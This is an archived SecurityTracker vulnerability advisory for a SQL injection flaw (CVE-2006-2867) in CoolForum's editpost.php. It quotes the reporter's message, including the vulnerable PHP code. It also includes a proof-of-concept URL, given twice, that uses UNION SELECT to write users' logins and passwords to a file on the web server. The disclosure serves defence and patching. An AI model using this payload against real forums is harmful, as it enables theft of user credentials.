SecurityTracker.com Archives - CoolForum Missing Input Validation in 'editpost.php' Lets Remote Users Inject SQL Commands

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Forum/Board/Portal) > CoolForum

Vendors: coolforum.net

CoolForum Missing Input Validation in 'editpost.php' Lets Remote Users Inject SQL Commands

SecurityTracker Alert ID: 1016218

SecurityTracker URL: http://securitytracker.com/id?1016218

CVE Reference: CVE-2006-2867 (Links to External Site)

Updated: May 22 2009

Original Entry Date: Jun 5 2006

Impact: Disclosure of system information, Disclosure of user information, User access via network

Exploit Included: Yes

Version(s): 0.8.3 beta and prior versions

Description: A vulnerability was reported in CoolForum. A remote user can inject SQL commands.

The 'editpost.php' script does not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

The original advisory is available at:

http://mgsdl.free.fr/advisories/coolforum083ba.txt

DarkFig reported this vulnerability.

Impact: A remote user can execute SQL commands on the underlying database.

Solution: No solution was available at the time of this entry.

Vendor URL: www.coolforum.net/ (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: gmdarkfig@gmail.com

Message History: None.

Source Message Contents

Date: Sat, 03 Jun 2006 09:09:54 +0000
From: gmdarkfig@gmail.com
Subject: Critical SQL Injection in CoolForum

 
Type: SQL Injection

Risk: Critical

Product: CoolForum <= 0.8.3 beta

********************************



Vulnerability

*************

// File: editpost.php

// Line 38

//

if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);

else $post = 0;

--

// Line 77

//

$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);

--

// File: admin/functions.php

// Line 623

//

function getrightedit($idpost,$forumid)

 

global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;

$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpo
st=".$idpost);

$j = mysql_fetch_array($query);

--



Proof Of Concept

****************

http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO O
UTFILE '/www/web/resultat.txt'%23&parent=1&p=1



Credits

*******

Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt

Note: Others SQL Injection exists but they are difficult to exploit

by DarkFig

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC